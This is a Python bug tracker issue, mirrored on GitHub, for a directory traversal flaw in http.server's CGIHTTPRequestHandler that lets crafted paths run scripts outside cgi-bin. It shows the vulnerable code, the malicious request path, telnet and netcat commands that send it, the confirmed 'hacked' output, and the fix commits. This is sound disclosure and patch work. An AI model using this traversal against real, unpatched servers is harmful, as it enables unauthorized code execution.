Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Directory traversal attack for CGIHTTPRequestHandler #63634

Closed
AlexanderKruppa mannequin opened this issue Oct 29, 2013 · 6 comments
Closed

Directory traversal attack for CGIHTTPRequestHandler #63634

AlexanderKruppa mannequin opened this issue Oct 29, 2013 · 6 comments
Assignees
@tiran
Labels
release-blocker stdlib Python modules in the Lib dir type-security A security issue

Comments

@AlexanderKruppa
Copy link
Mannequin

AlexanderKruppa mannequin commented Oct 29, 2013

BPO 19435
Nosy @warsaw, @birkenfeld, @vstinner, @larryhastings, @tiran, @benjaminp, @ned-deily, @Janzert
Files
  • cgi.patch
    		•

    Note: these values reflect the state of the issue at the time it was migrated and might not reflect the current state.

    Show more details

    GitHub fields:

    assignee = 'https://github.com/tiran'
closed_at = <Date 2013-10-30.16:51:29.356>
created_at = <Date 2013-10-29.16:34:01.527>
labels = ['type-security', 'library', 'release-blocker']
title = 'Directory traversal attack for CGIHTTPRequestHandler'
updated_at = <Date 2014-07-13.05:34:43.791>
user = 'https://bugs.python.org/AlexanderKruppa'

    bugs.python.org fields:

    activity = <Date 2014-07-13.05:34:43.791>
actor = 'ned.deily'
assignee = 'christian.heimes'
closed = True
closed_date = <Date 2013-10-30.16:51:29.356>
closer = 'python-dev'
components = ['Library (Lib)']
creation = <Date 2013-10-29.16:34:01.527>
creator = 'Alexander.Kruppa'
dependencies = []
files = ['32413']
hgrepos = []
issue_num = 19435
keywords = ['patch']
message_count = 6.0
messages = ['201645', '201647', '201673', '201747', '222911', '222913']
nosy_count = 12.0
nosy_names = ['barry', 'georg.brandl', 'vstinner', 'larry', 'christian.heimes', 'benjamin.peterson', 'ned.deily', 'Arfrever', 'python-dev', 'janzert', 'Alexander.Kruppa', 'glondu']
pr_nums = []
priority = 'release blocker'
resolution = 'fixed'
stage = 'resolved'
status = 'closed'
superseder = None
type = 'security'
url = 'https://bugs.python.org/issue19435'
versions = ['Python 2.7', 'Python 3.2', 'Python 3.3', 'Python 3.4']
    @AlexanderKruppa
    Copy link
    Mannequin Author

    AlexanderKruppa mannequin commented Oct 29, 2013

    An error in separating the path and filename of the CGI script to run in http.server.CGIHTTPRequestHandler allows running arbitrary executables in the directory under which the server was started.

    The problem is that in CGIHTTPRequestHandler we have:

      def run_cgi(self):    
      """Execute a CGI script."""    
      path = self.path    
      dir, rest = self.cgi_info    
  
      i = path.find('/', len(dir) + 1)

    where path is the uncollapsed path in the URL, but cgi_info contains the first path segment and the rest from the *collapsed* path as filled in by is_cgi(), so indexing into path via len(dir) is incorrect.

    An example exploit is giving the request path:

    ///////////badscript.sh/../cgi-bin/cgi.sh

    Note that Firefox and wget at least simplify the path in the request; to make sure this exact path is used, do for example:

    (echo "GET ///////////badscript.sh/../cgi-bin/cgi.sh HTTP/1.1"; echo) | telnet localhost 4443

    This causes the CGIHTTPRequestHandler to execute the badscript.sh file in the directory in which the server was started, so script execution is not restricted to the cgi-bin/ or htbin/ subdirectories.

    @AlexanderKruppa AlexanderKruppa mannequin added stdlib Python modules in the Lib dir type-security A security issue labels Oct 29, 2013
    @tiran
    Copy link
    Member

    tiran commented Oct 29, 2013

    I can confirm the issue:

    $ mkdir www
$ cd www
$ cat << EOF > badscript.sh
#!/bin/sh
echo hacked
EOF
$ chmod +x badscript.sh
$ ../python -m http.server --cgi


$ echo "GET ///////////badscript.sh/../cgi-bin/cgi.sh HTTP/1.1" | nc localhost 8000
HTTP/1.0 200 Script output follows
Server: SimpleHTTP/0.6 Python/3.4.0a4+
Date: Tue, 29 Oct 2013 16:47:22 GMT
hacked

    @tiran tiran self-assigned this Oct 29, 2013
    @benjaminp
    Copy link
    Contributor

    Patch

    @python-dev
    Copy link
    Mannequin

    python-dev mannequin commented Oct 30, 2013

    New changeset e4fe8fcaef0d by Benjamin Peterson in branch '2.7':
    use the collapsed path in the run_cgi method (closes bpo-19435)
    http://hg.python.org/cpython/rev/e4fe8fcaef0d

    New changeset b1ddcb220a7f by Benjamin Peterson in branch '3.1':
    use the collapsed path in the run_cgi method (closes bpo-19435)
    http://hg.python.org/cpython/rev/b1ddcb220a7f

    New changeset dda1a32748e0 by Benjamin Peterson in branch '3.2':
    merge 3.1 (bpo-19435)
    http://hg.python.org/cpython/rev/dda1a32748e0

    New changeset 544b654d000c by Benjamin Peterson in branch '3.3':
    merge 3.2 (bpo-19435)
    http://hg.python.org/cpython/rev/544b654d000c

    New changeset 493a99acaf00 by Benjamin Peterson in branch 'default':
    merge 3.3 (bpo-19435)
    http://hg.python.org/cpython/rev/493a99acaf00

    @python-dev python-dev mannequin closed this as completed Oct 30, 2013
    @python-dev
    Copy link
    Mannequin

    python-dev mannequin commented Jul 13, 2014

    New changeset d367ea865ea4 by Ned Deily in branch '2.7':
    Issue bpo-21323: Fix CGIHTTPServer to again handle scripts in CGI subdirectories,
    http://hg.python.org/cpython/rev/d367ea865ea4

    New changeset 4de94641ba3e by Ned Deily in branch '3.2':
    Issue bpo-21323: Fix http.server to again handle scripts in CGI subdirectories,
    http://hg.python.org/cpython/rev/4de94641ba3e

    New changeset b957f475e41e by Ned Deily in branch '3.3':
    Issue bpo-21323: Fix http.server to again handle scripts in CGI subdirectories,
    http://hg.python.org/cpython/rev/b957f475e41e

    New changeset 385f4406dc26 by Ned Deily in branch '3.4':
    Issue bpo-21323: Fix http.server to again handle scripts in CGI subdirectories,
    http://hg.python.org/cpython/rev/385f4406dc26

    New changeset 22e5a85ba840 by Ned Deily in branch 'default':
    Issue bpo-21323: Fix http.server to again handle scripts in CGI subdirectories,
    http://hg.python.org/cpython/rev/22e5a85ba840

    @ned-deily
    Copy link
    Member

    See bpo-21323 for details of a problem introduced by the original fixes for this problem and now fixed (except for 3.1 which is now end-of-life).

    @ezio-melotti ezio-melotti transferred this issue from another repository Apr 10, 2022
    Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
    Assignees

    @tiran tiran

    Labels
    release-blocker stdlib Python modules in the Lib dir type-security A security issue
    Projects
    None yet
    Milestone
    No milestone
    Development

    No branches or pull requests
    3 participants
    @benjaminp @tiran @ned-deily